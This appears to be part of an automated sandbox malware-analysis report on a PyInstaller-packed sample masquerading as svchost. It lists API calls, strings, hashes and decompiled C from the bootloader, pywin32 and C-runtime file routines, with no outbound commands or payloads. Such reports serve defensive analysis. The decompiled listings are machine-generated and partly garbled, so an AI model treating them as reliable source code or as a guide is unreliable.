                            • PyModule_Create2.PYTHON38(6DA88FF0,000003F5), ref: 6DA7BF59
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481554182.000000006DA71000.00000020.00020000.sdmp, Offset: 6DA70000, based on PE: true
                            • Associated: 00000013.00000002.481543562.000000006DA70000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481580186.000000006DA7F000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481590632.000000006DA88000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481599637.000000006DA8B000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da70000_svchost.jbxd
                            Similarity
                            • API ID: Create2Module_
                            • String ID: Advapi32.dll$Advapi32.dll$ChangeDisplaySettingsExW$EnumDisplayDevicesW$EnumDisplayMonitors$EnumDisplaySettingsExW$GetComputerNameExW$GetComputerObjectNameW$GetDllDirectoryW$GetHandleInformation$GetLastInputInfo$GetLongPathNameA$GetLongPathNameW$GetMonitorInfoW$GetNativeSystemInfo$GetSystemFileCacheSize$GetUserNameExW$GlobalMemoryStatusEx$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$NameCanonical$NameCanonicalEx$NameDisplay$NameFullyQualifiedDN$NameSamCompatible$NameServicePrincipal$NameUniqueId$NameUnknown$NameUserPrincipal$PyDISPLAY_DEVICEType$REG_NOTIFY_CHANGE_ATTRIBUTES$REG_NOTIFY_CHANGE_LAST_SET$REG_NOTIFY_CHANGE_NAME$REG_NOTIFY_CHANGE_SECURITY$RegCopyTreeW$RegCreateKeyTransactedW$RegDeleteKeyExW$RegDeleteKeyTransactedW$RegDeleteTreeW$RegOpenCurrentUser$RegOpenKeyTransactedW$RegOverridePredefKey$RegRestoreKeyW$RegSaveKeyExW$STD_ERROR_HANDLE$STD_INPUT_HANDLE$STD_OUTPUT_HANDLE$SetDllDirectoryW$SetHandleInformation$SetSystemFileCacheSize$SetSystemPowerState$VFT_APP$VFT_DLL$VFT_DRV$VFT_FONT$VFT_STATIC_LIB$VFT_UNKNOWN$VFT_VXD$VOS_DOS$VOS_DOS_WINDOWS16$VOS_DOS_WINDOWS32$VOS_NT$VOS_NT_WINDOWS32$VOS_OS216$VOS_OS216_PM16$VOS_OS232$VOS_OS232_PM32$VOS_UNKNOWN$VOS__PM16$VOS__PM32$VOS__WINDOWS16$VOS__WINDOWS32$VS_FF_DEBUG$VS_FF_INFOINFERRED$VS_FF_PATCHED$VS_FF_PRERELEASE$VS_FF_PRIVATEBUILD$VS_FF_SPECIALBUILD$error$kernel32.dll$kernel32.dll$secur32.dll$secur32.dll$user32.dll$user32.dll
                            • API String ID: 2002799645-2903159764
                            • Opcode ID: 907e85cd600c38220754d69b07d623b298df0be130ac9d4b2c7078961f067245
                            • Instruction ID: e762db895d93616a8e89451ef64a81200cc9329499ed52bc5230d58e58765ff6
                            • Opcode Fuzzy Hash: 907e85cd600c38220754d69b07d623b298df0be130ac9d4b2c7078961f067245
                            • Instruction Fuzzy Hash: 3DB160A4D4C3257EDA316F764DCDF3F2DB8FB46666F00442AFD08A2183DB68408299A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • PyUnicode_Decode.PYTHON38(00003068,00003069,utf-8,strict,00000000,00000000,00BC2044,00000000,00000000,00000000,?,?,?,00000000), ref: 00BC3256
                            • PySys_SetObject.PYTHON38(_MEIPASS,00000000,?), ref: 00BC327D
                            • PyImport_ImportModule.PYTHON38(marshal), ref: 00BC3288
                            • PyModule_GetDict.PYTHON38(00000000), ref: 00BC328F
                            • PyDict_GetItemString.PYTHON38(00000000,loads), ref: 00BC329B
                            • htonl.WS2_32(?), ref: 00BC32DC
                            • htonl.WS2_32(?), ref: 00BC32EA
                            • PyObject_CallFunction.PYTHON38(00000000,00BE1604,0000000C,-0000000C,?,?,00000000), ref: 00BC32FD
                            • PyImport_ExecCodeModule.PYTHON38(?,00000000), ref: 00BC330F
                            • PyErr_Occurred.PYTHON38 ref: 00BC332D
                            • PyErr_Print.PYTHON38 ref: 00BC3337
                            • PyErr_Clear.PYTHON38 ref: 00BC333D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Err_$Import_Modulehtonl$CallClearCodeDecodeDictDict_ExecFunctionImportItemModule_ObjectObject_OccurredPrintStringSys_Unicode_
                            • String ID: Failed to get _MEIPASS as PyObject.$_MEIPASS$loads$marshal$mod is NULL - %s$strict$utf-8
                            • API String ID: 3206803411-3336796446
                            • Opcode ID: c1c340891ce5f5ede9b8d9f68c7cc7b6ac5600d4b0e54342d9c3b0f89eca212b
                            • Instruction ID: d2e59c78d3e2a6452f53d8c29e55124e93e8d169c30e3e4b30def1231b14db3f
                            • Opcode Fuzzy Hash: c1c340891ce5f5ede9b8d9f68c7cc7b6ac5600d4b0e54342d9c3b0f89eca212b
                            • Instruction Fuzzy Hash: 183157765002406FCB102B79AC8AE6B7FECEA817117448999F807E7153EF31EA1186A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • PyImport_AddModule.PYTHON38(__main__,00000000,00000000,00BC205E,00000000,?,?,00000000,00000000,?,?,?,00000000), ref: 00BC2239
                            • PyModule_GetDict.PYTHON38(00000000,?,?,?,00000000,00000000,?,?,?,00000000), ref: 00BC2272
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: DictImport_ModuleModule_
                            • String ID: %s.py$Could not get __main__ module's dict.$Could not get __main__ module.$Failed to execute script %s$Failed to unmarshal code object for %s$Name exceeds PATH_MAX$__file__$__main__
                            • API String ID: 1159605621-2368408649
                            • Opcode ID: 3182cbd4b9867e6584759273758bfb3b78269ebd6c0b94de9cd4688316363cac
                            • Instruction ID: 629c48bde79b9bf758f21a8e5eaa54c42d9692f4bdd0c63d363066ad1ecc50c6
                            • Opcode Fuzzy Hash: 3182cbd4b9867e6584759273758bfb3b78269ebd6c0b94de9cd4688316363cac
                            • Instruction Fuzzy Hash: 61416EB59042806FD710A739EC86F5B7BD8FF84321F0406A9F809D6193EFB9D58586A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:CreateMutex,?,?,?), ref: 6DA91543
                            • ?PyWinObject_AsSECURITY_ATTRIBUTES@@YAHPAU_object@@PAPAU_SECURITY_ATTRIBUTES@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DA91561
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DA9157B
                            • PyEval_SaveThread.PYTHON38 ref: 6DA9158A
                            • CreateMutexW.KERNEL32(?,?,?), ref: 6DA9159E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA915A7
                            • ?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DA915BA
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DA915C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Eval_Thread$Arg_CreateFreeFromMutexParseRestoreSaveTuple
                            • String ID: CreateMutex$OiO:CreateMutex
                            • API String ID: 3622171656-1372909194
                            • Opcode ID: 0b4157def8d1f9d889cac2f36118d290f7285fc803060f752efd73dd406bbf3d
                            • Instruction ID: f6e7f0781b0fad480780b884b1d98c50c1b4b0bd7c8d19df1961d6e4115610d2
                            • Opcode Fuzzy Hash: 0b4157def8d1f9d889cac2f36118d290f7285fc803060f752efd73dd406bbf3d
                            • Instruction Fuzzy Hash: 0A213479018301AFDB005B58CC08BAF7BF8FF89318F518425F969C51A1EB71C1698B9B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E00BC1560(void* __ecx, void* __edx, void* __ebp, signed int* _a4) {
                            				void* _t14;
                            				signed int _t15;
                            				void* _t18;
                            				signed int _t19;
                            				void* _t20;
                            				signed int _t26;
                            				signed int _t28;
                            				void* _t31;
                            				void* _t32;
                            				signed int* _t33;
                            				void* _t35;
                            				void* _t36;
                            
                            				_t32 = __edx;
                            				_t31 = __ecx;
                            				_t33 = _a4;
                            				if( *_t33 != 0) {
                            					L2:
                            					_t14 = E00BC1120(_t32, _t33);
                            					_t36 = _t35 + 4;
                            					_t48 = _t14 - 1;
                            					if(_t14 < 1) {
                            						E00BC9F16(_t32,  *_t33, 0, 2); // executed
                            						_t14 = E00BCA488(_t32, _t48,  *_t33); // executed
                            						_t36 = _t36 + 0x10;
                            					}
                            					_t15 = E00BC13D0(_t32, _t33, _t14);
                            					if(_t15 == 0xffffffff) {
                            						goto L7;
                            					} else {
                            						_t3 =  &(_t33[9]); // 0x1
                            						_push( *_t3);
                            						_t33[0x101b] = 0;
                            						L00BC7864();
                            						_push(0);
                            						 *0xbec954 = _t15;
                            						_t5 =  &(_t33[7]); // 0xc0335f00
                            						L00BC7864();
                            						_t6 =  &(_t33[1]); // 0x1a74c085
                            						_t18 = E00BC9F16(_t32,  *_t33, _t15 +  *_t6,  *_t5); // executed
                            						_t7 =  &(_t33[8]); // 0xb85fc35b
                            						_push( *_t7);
                            						L00BC7864();
                            						_push(_t18);
                            						_t19 = E00BC9808(_t31);
                            						_t33[2] = _t19;
                            						_t50 = _t19;
                            						if(_t19 != 0) {
                            							_push( *_t33);
                            							_t9 =  &(_t33[8]); // 0xb85fc35b
                            							L00BC7864();
                            							_t10 =  &(_t33[2]); // 0xc085078b, executed
                            							_t20 = E00BC9B2B( *_t10, _t19,  *_t9, 1); // executed
                            							__eflags = _t20 - 1;
                            							if(__eflags >= 0) {
                            								_t11 =  &(_t33[8]); // 0xb85fc35b
                            								_push( *_t11);
                            								L00BC7864();
                            								_t12 =  &(_t33[2]); // 0xc085078b
                            								_t33[3] = _t20 +  *_t12;
                            								__eflags = E00BC9934( *_t33);
                            								if(__eflags == 0) {
                            									E00BC1200(_t33);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_push("Error on file\n.");
                            									_t26 = E00BC1910(__eflags) | 0xffffffff;
                            									__eflags = _t26;
                            									return _t26;
                            								}
                            							} else {
                            								_push("Could not read from file.");
                            								_push("fread");
                            								_t28 = E00BC17B0(__eflags) | 0xffffffff;
                            								__eflags = _t28;
                            								return _t28;
                            							}
                            						} else {
                            							_push("Could not allocate buffer for TOC.");
                            							_push("malloc");
                            							_t15 = E00BC17B0(_t50);
                            							goto L7;
                            						}
                            					}
                            				} else {
                            					_t2 =  &(_t33[0x1a]); // 0xbc176c
                            					_t15 = E00BC28C0(_t2, "rb");
                            					_t35 = _t35 + 8;
                            					 *_t33 = _t15;
                            					if(_t15 == 0) {
                            						L7:
                            						return _t15 | 0xffffffff;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}
















                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Could not allocate buffer for TOC.$Could not read from file.$Error on file.$fread$malloc
                            • API String ID: 3757756281-2332847760
                            • Opcode ID: c0670cc3293481cd2ff9dd16e1d9cb59a38bf990607d18526bb3834063b13dfc
                            • Instruction ID: eb39f4b92f98aa1f145c8edec88a18544ea6feaf076d5932ffa5975d83457124
                            • Opcode Fuzzy Hash: c0670cc3293481cd2ff9dd16e1d9cb59a38bf990607d18526bb3834063b13dfc
                            • Instruction Fuzzy Hash: 5C21E9B5850700ABEA207B39AC07F5A76E4AF11354F140EECF599A02E3FB72E5508A56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 77%
                            			E00BD2128(signed int _a4, void* _a8, unsigned int _a12) {
                            				signed int _v5;
                            				char _v6;
                            				void* _v12;
                            				unsigned int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				void* _v32;
                            				long _v36;
                            				void* _v40;
                            				long _v44;
                            				signed int* _t143;
                            				signed int _t145;
                            				intOrPtr _t149;
                            				signed int _t153;
                            				signed int _t155;
                            				signed char _t157;
                            				unsigned int _t158;
                            				intOrPtr _t162;
                            				void* _t163;
                            				signed int _t164;
                            				signed int _t167;
                            				long _t168;
                            				intOrPtr _t175;
                            				signed int _t176;
                            				intOrPtr _t178;
                            				signed int _t180;
                            				signed int _t184;
                            				char _t191;
                            				char* _t192;
                            				char _t199;
                            				char* _t200;
                            				signed char _t211;
                            				signed int _t213;
                            				long _t215;
                            				signed int _t216;
                            				char _t218;
                            				signed char _t222;
                            				signed int _t223;
                            				unsigned int _t224;
                            				intOrPtr _t225;
                            				unsigned int _t229;
                            				intOrPtr _t231;
                            				signed int _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				signed int _t235;
                            				signed char _t236;
                            				signed int _t237;
                            				signed int _t239;
                            				signed int _t240;
                            				signed int _t241;
                            				signed int _t242;
                            				signed int _t246;
                            				void* _t248;
                            				void* _t249;
                            
                            				_t213 = _a4;
                            				if(_t213 != 0xfffffffe) {
                            					__eflags = _t213;
                            					if(_t213 < 0) {
                            						L58:
                            						_t143 = E00BCC9BB();
                            						 *_t143 =  *_t143 & 0x00000000;
                            						__eflags =  *_t143;
                            						 *((intOrPtr*)(E00BCC9CE())) = 9;
                            						L59:
                            						_t145 = E00BD1788();
                            						goto L60;
                            					}
                            					__eflags = _t213 -  *0xbf6308; // 0x40
                            					if(__eflags >= 0) {
                            						goto L58;
                            					}
                            					_v24 = 1;
                            					_t239 = _t213 >> 6;
                            					_t235 = (_t213 & 0x0000003f) * 0x30;
                            					_v20 = _t239;
                            					_t149 =  *((intOrPtr*)(0xbf6108 + _t239 * 4));
                            					_v28 = _t235;
                            					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                            					_v5 = _t222;
                            					__eflags = _t222 & 0x00000001;
                            					if((_t222 & 0x00000001) == 0) {
                            						goto L58;
                            					}
                            					_t223 = _a12;
                            					__eflags = _t223 - 0x7fffffff;
                            					if(_t223 <= 0x7fffffff) {
                            						__eflags = _t223;
                            						if(_t223 == 0) {
                            							L57:
                            							return 0;
                            						}
                            						__eflags = _v5 & 0x00000002;
                            						if((_v5 & 0x00000002) != 0) {
                            							goto L57;
                            						}
                            						__eflags = _a8;
                            						if(_a8 == 0) {
                            							goto L6;
                            						}
                            						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                            						_v5 = _t153;
                            						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                            						_t246 = 0;
                            						_t155 = _t153 - 1;
                            						__eflags = _t155;
                            						if(_t155 == 0) {
                            							_t236 = _v24;
                            							_t157 =  !_t223;
                            							__eflags = _t236 & _t157;
                            							if((_t236 & _t157) != 0) {
                            								_t158 = 4;
                            								_t224 = _t223 >> 1;
                            								_v16 = _t158;
                            								__eflags = _t224 - _t158;
                            								if(_t224 >= _t158) {
                            									_t158 = _t224;
                            									_v16 = _t224;
                            								}
                            								_t246 = E00BD0A25(_t224, _t158);
                            								E00BD09EB(0);
                            								E00BD09EB(0);
                            								_t249 = _t248 + 0xc;
                            								_v12 = _t246;
                            								__eflags = _t246;
                            								if(_t246 != 0) {
                            									_t162 = E00BD2807(_t213, 0, 0, _v24);
                            									_t225 =  *((intOrPtr*)(0xbf6108 + _t239 * 4));
                            									_t248 = _t249 + 0x10;
                            									_t240 = _v28;
                            									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                            									_t163 = _t246;
                            									 *(_t240 + _t225 + 0x24) = _t236;
                            									_t235 = _t240;
                            									_t223 = _v16;
                            									L21:
                            									_t241 = 0;
                            									_v40 = _t163;
                            									_t215 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
                            									_v36 = _t215;
                            									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                            									_t216 = _a4;
                            									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                            										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                            										_v6 = _t218;
                            										__eflags = _t218 - 0xa;
                            										_t216 = _a4;
                            										if(_t218 != 0xa) {
                            											__eflags = _t223;
                            											if(_t223 != 0) {
                            												_t241 = _v24;
                            												 *_t163 = _v6;
                            												_t216 = _a4;
                            												_t232 = _t223 - 1;
                            												__eflags = _v5;
                            												_v12 = _t163 + 1;
                            												_v16 = _t232;
                            												 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2a)) = 0xa;
                            												if(_v5 != 0) {
                            													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2b));
                            													_v6 = _t191;
                            													__eflags = _t191 - 0xa;
                            													if(_t191 != 0xa) {
                            														__eflags = _t232;
                            														if(_t232 != 0) {
                            															_t192 = _v12;
                            															_t241 = 2;
                            															 *_t192 = _v6;
                            															_t216 = _a4;
                            															_t233 = _t232 - 1;
                            															_v12 = _t192 + 1;
                            															_v16 = _t233;
                            															 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2b)) = 0xa;
                            															__eflags = _v5 - _v24;
                            															if(_v5 == _v24) {
                            																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2c));
                            																_v6 = _t199;
                            																__eflags = _t199 - 0xa;
                            																if(_t199 != 0xa) {
                            																	__eflags = _t233;
                            																	if(_t233 != 0) {
                            																		_t200 = _v12;
                            																		_t241 = 3;
                            																		 *_t200 = _v6;
                            																		_t216 = _a4;
                            																		_t234 = _t233 - 1;
                            																		__eflags = _t234;
                            																		_v12 = _t200 + 1;
                            																		_v16 = _t234;
                            																		 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2c)) = 0xa;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            									_t164 = E00BD8D71(_t216);
                            									__eflags = _t164;
                            									if(_t164 == 0) {
                            										L41:
                            										_v24 = 0;
                            										L42:
                            										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
                            										__eflags = _t167;
                            										if(_t167 == 0) {
                            											L53:
                            											_t168 = GetLastError();
                            											_t241 = 5;
                            											__eflags = _t168 - _t241;
                            											if(_t168 != _t241) {
                            												__eflags = _t168 - 0x6d;
                            												if(_t168 != 0x6d) {
                            													L37:
                            													E00BCC998(_t168);
                            													goto L38;
                            												}
                            												_t242 = 0;
                            												goto L39;
                            											}
                            											 *((intOrPtr*)(E00BCC9CE())) = 9;
                            											 *(E00BCC9BB()) = _t241;
                            											goto L38;
                            										}
                            										_t229 = _a12;
                            										__eflags = _v36 - _t229;
                            										if(_v36 > _t229) {
                            											goto L53;
                            										}
                            										_t242 = _t241 + _v36;
                            										__eflags = _t242;
                            										L45:
                            										_t237 = _v28;
                            										_t175 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
                            										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                            										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                            											__eflags = _v5 - 2;
                            											if(_v5 == 2) {
                            												__eflags = _v24;
                            												_push(_t242 >> 1);
                            												_push(_v40);
                            												_push(_t216);
                            												if(_v24 == 0) {
                            													_t176 = E00BD1C82();
                            												} else {
                            													_t176 = E00BD1F94();
                            												}
                            											} else {
                            												_t230 = _t229 >> 1;
                            												__eflags = _t229 >> 1;
                            												_t176 = E00BD1E42(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                            											}
                            											_t242 = _t176;
                            										}
                            										goto L39;
                            									}
                            									_t104 =  &_v28; // 0xa
                            									_t231 =  *_t104;
                            									_t178 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
                            									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                            									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                            										goto L41;
                            									}
                            									_t180 = GetConsoleMode(_v32,  &_v44);
                            									__eflags = _t180;
                            									if(_t180 == 0) {
                            										goto L41;
                            									}
                            									__eflags = _v5 - 2;
                            									if(_v5 != 2) {
                            										goto L42;
                            									}
                            									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                            									__eflags = _t184;
                            									if(_t184 != 0) {
                            										_t229 = _a12;
                            										_t242 = _t241 + _v36 * 2;
                            										goto L45;
                            									}
                            									_t168 = GetLastError();
                            									goto L37;
                            								} else {
                            									 *((intOrPtr*)(E00BCC9CE())) = 0xc;
                            									 *(E00BCC9BB()) = 8;
                            									L38:
                            									_t242 = _t241 | 0xffffffff;
                            									__eflags = _t242;
                            									L39:
                            									E00BD09EB(_t246);
                            									return _t242;
                            								}
                            							}
                            							L15:
                            							 *(E00BCC9BB()) =  *_t206 & _t246;
                            							 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            							E00BD1788();
                            							goto L38;
                            						}
                            						__eflags = _t155 != 1;
                            						if(_t155 != 1) {
                            							L13:
                            							_t163 = _a8;
                            							_v16 = _t223;
                            							_v12 = _t163;
                            							goto L21;
                            						}
                            						_t211 =  !_t223;
                            						__eflags = _t211 & 0x00000001;
                            						if((_t211 & 0x00000001) == 0) {
                            							goto L15;
                            						}
                            						goto L13;
                            					}
                            					L6:
                            					 *(E00BCC9BB()) =  *_t151 & 0x00000000;
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					goto L59;
                            				} else {
                            					 *(E00BCC9BB()) =  *_t212 & 0x00000000;
                            					_t145 = E00BCC9CE();
                            					 *_t145 = 9;
                            					L60:
                            					return _t145 | 0xffffffff;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: 5a8a24454ab77b184c9ccaa2a78b65c39beda3d915695c3bc789f107a7c1e10d
                            • Instruction ID: bff4143a95d9996373329706eddad119105cd9acddae45de1fe72ae26014bfa0
                            • Opcode Fuzzy Hash: 5a8a24454ab77b184c9ccaa2a78b65c39beda3d915695c3bc789f107a7c1e10d
                            • Instruction Fuzzy Hash: DBC1AF74D04289AFDF119FA8C881BADFBF0EF2A310F1441DAE954A7392E7749941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 336 bdbd1f-bdbd4f call bdbaf3 339 bdbd6a-bdbd76 call bce783 336->339 340 bdbd51-bdbd5c call bcc9bb 336->340 345 bdbd8f-bdbdd8 call bdba5e 339->345 346 bdbd78-bdbd8d call bcc9bb call bcc9ce 339->346 347 bdbd5e-bdbd65 call bcc9ce 340->347 355 bdbdda-bdbde3 345->355 356 bdbe45-bdbe4e GetFileType 345->356 346->347 357 bdc041-bdc047 347->357 361 bdbe1a-bdbe40 GetLastError call bcc998 355->361 362 bdbde5-bdbde9 355->362 358 bdbe97-bdbe9a 356->358 359 bdbe50-bdbe81 GetLastError call bcc998 CloseHandle 356->359 364 bdbe9c-bdbea1 358->364 365 bdbea3-bdbea9 358->365 359->347 373 bdbe87-bdbe92 call bcc9ce 359->373 361->347 362->361 366 bdbdeb-bdbe18 call bdba5e 362->366 369 bdbead-bdbefb call bce6cc 364->369 365->369 370 bdbeab 365->370 366->356 366->361 379 bdbefd-bdbf09 call bdbc6f 369->379 380 bdbf0b-bdbf2f call bdb811 369->380 370->369 373->347 379->380 385 bdbf33-bdbf3d call bd18f4 379->385 386 bdbf31 380->386 387 bdbf42-bdbf85 380->387 385->357 386->385 389 bdbf87-bdbf8b 387->389 390 bdbfa6-bdbfb4 387->390 389->390 392 bdbf8d-bdbfa1 389->392 393 bdc03f 390->393 394 bdbfba-bdbfbe 390->394 392->390 393->357 394->393 395 bdbfc0-bdbff3 CloseHandle call bdba5e 394->395 398 bdbff5-bdc021 GetLastError call bcc998 call bce895 395->398 399 bdc027-bdc03b 395->399 398->399 399->393
                            C-Code - Quality: 42%
                            			E00BDBD1F(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                            				signed int _v5;
                            				char _v6;
                            				void* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v36;
                            				signed int _v44;
                            				void _v48;
                            				char _v72;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t114;
                            				void* _t122;
                            				signed int _t123;
                            				signed char _t124;
                            				signed int _t134;
                            				intOrPtr _t164;
                            				intOrPtr _t180;
                            				signed int* _t190;
                            				signed int _t192;
                            				char _t197;
                            				signed int _t203;
                            				signed int _t206;
                            				signed int _t215;
                            				signed int _t217;
                            				signed int _t219;
                            				signed int _t225;
                            				signed int _t227;
                            				signed int _t234;
                            				signed int _t235;
                            				signed int _t237;
                            				signed int _t239;
                            				void* _t240;
                            				signed char _t243;
                            				intOrPtr _t246;
                            				void* _t249;
                            				void* _t253;
                            				void* _t263;
                            				signed int _t264;
                            				signed int _t267;
                            				signed int _t270;
                            				signed int _t271;
                            				void* _t273;
                            				void* _t275;
                            				void* _t276;
                            				void* _t278;
                            				void* _t279;
                            				void* _t281;
                            				void* _t285;
                            
                            				_t240 = __edx;
                            				_t263 = E00BDBAF3(__ecx,  &_v72, _a16, _a20, _a24);
                            				_t192 = 6;
                            				memcpy( &_v48, _t263, _t192 << 2);
                            				_t275 = _t273 + 0x1c;
                            				_t249 = _t263 + _t192 + _t192;
                            				_t264 = _t263 | 0xffffffff;
                            				if(_v36 != _t264) {
                            					_t114 = E00BCE783(_t240, _t249, _t264, __eflags);
                            					_t190 = _a8;
                            					 *_t190 = _t114;
                            					__eflags = _t114 - _t264;
                            					if(_t114 != _t264) {
                            						_v20 = _v20 & 0x00000000;
                            						_v24 = 0xc;
                            						_t276 = _t275 - 0x18;
                            						 *_a4 = 1;
                            						_push(6);
                            						_v16 =  !(_a16 >> 7) & 1;
                            						_push( &_v24);
                            						_push(_a12);
                            						memcpy(_t276,  &_v48, 1 << 2);
                            						_t197 = 0;
                            						_t122 = E00BDBA5E(); // executed
                            						_t253 = _t122;
                            						_t278 = _t276 + 0x2c;
                            						_v12 = _t253;
                            						__eflags = _t253 - 0xffffffff;
